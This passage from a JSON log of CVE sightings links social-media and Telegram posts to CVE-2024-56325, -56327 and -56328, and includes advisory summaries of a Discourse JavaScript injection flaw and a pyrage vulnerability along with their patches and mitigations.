"https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lk3qrtl7nar2", "content": "", "creation_timestamp": "2025-03-11T09:27:39.526456Z"}, {"uuid": "47559415-ee1d-43d3-853f-33019e8b21be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llex5sozja2r", "content": "", "creation_timestamp": "2025-03-27T18:39:53.177535Z"}, {"uuid": "94efbc0d-c553-48db-ae2f-2a8618c262d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmif532gvs2p", "content": "", "creation_timestamp": "2025-04-10T20:53:12.140118Z"}, {"uuid": "59a88e82-498b-4cdc-a2a7-3b40e6d7dc61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56328", "type": "seen", "source": "https://t.me/cvedetector/17251", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56328 - Discourse JavaScript Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-56328 \nPublished : Feb. 4, 2025, 9:15 p.m. | 2\u00a0hours, 7\u00a0minutes ago \nDescription : Discourse is an open source platform for community discussion. An attacker can execute arbitrary JavaScript on users' browsers by posting a maliciously crafted onebox url. This issue only affects sites with CSP disabled. This problem has been patched in the latest version of Discourse. Users are advised to upgrade. Users unable to upgrade should enable CSP, disable inline Oneboxes globally, or allow specific domains for Oneboxing. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-05T00:45:53.000000Z"}, {"uuid": "53c224cb-2cc1-4c47-80aa-68fcfa611584", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "https://t.me/cvedetector/13384", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56327 - pyrage Depwiseage Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-56327 \nPublished : Dec. 19, 2024, 11:15 p.m. | 28\u00a0minutes ago \nDescription : pyrage is a set of Python bindings for the rage file encryption library (age in Rust). `pyrage` uses the Rust `age` crate for its underlying operations, and `age` is vulnerable to GHSA-4fg7-vxc8-qx5w. All details of GHSA-4fg7-vxc8-qx5w are relevant to `pyrage` for the versions specified in this advisory. See GHSA-4fg7-vxc8-qx5w for full details. Versions of `pyrage` before 1.2.0 lack plugin support and are therefore **not affected**. An equivalent issue was fixed in [the reference Go implementation of age](), see advisory GHSA-32gq-x56h-299c. This issue has been addressed in version 1.2.3 and all users are advised to update. There are no known workarounds for this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-20T00:51:24.000000Z"}]}